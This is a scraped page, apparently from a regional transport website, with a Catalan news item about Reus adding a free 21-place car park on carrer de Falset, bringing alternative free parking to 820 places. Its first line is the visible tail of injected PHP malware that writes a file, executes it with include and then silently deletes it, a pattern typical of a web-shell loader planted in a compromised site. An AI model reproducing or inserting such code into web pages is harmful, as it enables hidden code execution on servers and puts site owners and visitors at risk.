");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Reus amplia l'oferta d’aparcaments alternatius gratuïts amb 21 noves places al carrer de Falset
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Reus amplia l'oferta d’aparcaments alternatius gratuïts amb 21 noves places al carrer de Falset (11/08/2020)

L’Ajuntament de Reus ha finalitzat les obres del nou aparcament gratuït alternatiu del carrer de Falset i ha posat les 21 places del nou espai a disposició dels veïns del barri i de les persones que visiten la ciutat, per facilitar la mobilitat de proximitat i al centre de la ciutat. Els aparcaments tenen el doble objectiu de donar resposta a les necessitats de places d’estacionament dels veïns de l’entorn, i oferir pàrquings alternatius a les persones que visiten Reus.

L’oferta d’aparcaments alternatius gratuïts sumen 820 places

L’aparcament del carrer de Falset s’afegeix a l’oferta d’aparcaments gratuïts alternatius de la ciutat, que en total suma 820 places: 275 places a l’avinguda dels Països Catalans, 50 places al carrer de Sor Lluïsa Estivill, 24 places al raval de Sol i Vista, 42 places al carrer de Roger de Llúria, 68 places a la plaça del Velòdrom, 140 places amb dos aparcaments al barri Gaudí, i 200 places més davant l’institut Pi del Burgar.

Les obres de l’aparcament alternatiu del carrer de Falset es van iniciar el passat mes de juliol i aquesta setmana s’han donat per acabades. Amb un cost de 27.124 euros, les obres han consistit en la pavimentació, asfaltat i pintura del terreny, la construcció d’una vorada per desplaçar 3 metres la zona d’aparcament de vehicles de les façanes dels habitatges, i la construcció dels embornals per a l’evacuació d’aigües.

Font: Ajuntament de Reus

Reus amplia l'oferta d’aparcaments alternatius gratuïts amb 21 noves places al carrer de Falset

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona